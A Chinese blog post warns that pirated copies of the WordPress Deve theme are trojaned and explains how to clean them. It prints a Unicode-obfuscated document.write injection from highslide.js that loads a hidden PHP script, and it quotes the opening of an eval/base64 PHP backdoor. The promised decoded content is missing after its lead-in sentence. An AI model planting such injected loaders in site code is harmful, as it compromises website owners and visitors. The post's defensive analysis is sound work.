通知WordPress Deve主题被挂马

近几天突然想换主题了，就想起以前看过的Deve主题，不过貌似是收费的，我等穷学生没钱只能D版了，在此感谢主题作者！

在网上搜索下，居然在新浪爱问里提供Deve主题的下载，不过由于我使用Google搜索的，无意中看到一篇文章提到网上的Deve主题大多都带木 马。这引起了我的警惕。下载后按照网上的提示，果然找到了一个问题文件，二话不说用ASC扫描了下载的压缩包后杀软提示有两处木马威胁！！唉，用了快两年 的wordpress，主题居然也有人去挂马。

下面说一下如何处理：

第一处可疑点：…\Deve\functions\cache

据我查询，Deve主题应该存在此目录且为空。而下载的这份主题的这个目录下尽是乱起八糟的图片文件，如果仔细看就会发现其中暗藏一个名为 “18fe3d6fd3a2f42887243b8b64b0f4a4.php”的文件，打开后发现是以“<?php eval(gzuncompress(base64_decode(…”开头的，经过Base64方法等加密处理后的PHP木马。解决方法是清空此目录即 可。

第二处可疑点：…\Deve\highslide\highslide.js

打开后会发现文件开头有这么一段Unicode编码的字符串：

document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079
\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076
\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u0022\u0020\u0073\u0072\u0063
\u003D\u0022\u002F\u0077\u0070\u002D\u0069\u006E\u0063\u006C\u0075\u0064
\u0065\u0073\u002F\u006A\u0073\u002F\u0074\u0069\u006E\u0079\u006D\u0063
\u0065\u002F\u0074\u0068\u0065\u006D\u0065\u0073\u002F\u006D\u0065\u006E
\u0075\u0073\u0070\u0065\u0063\u0073\u002E\u0070\u0068\u0070\u0022\u003E
\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");

而实际上源文件里根本木有这些内容，源文件是以其后的“if(!hs){var hs={lang…”打头的。

等等，我很好奇这一段的真实内容是什么，于是写了几行程序解码，发现解密的内容是：

后记

鉴于用了这个主题，故有了这篇文章，其中可能有不对的地方，敬请各路大神指点。
本人再次提醒wordpress朋友，安装主题一定要去官网下载。通过其他途径下载的一定要用杀软扫描。本人强烈建议用在线病毒扫描网www.virscan.org来进一步确认下载的文件是否安全。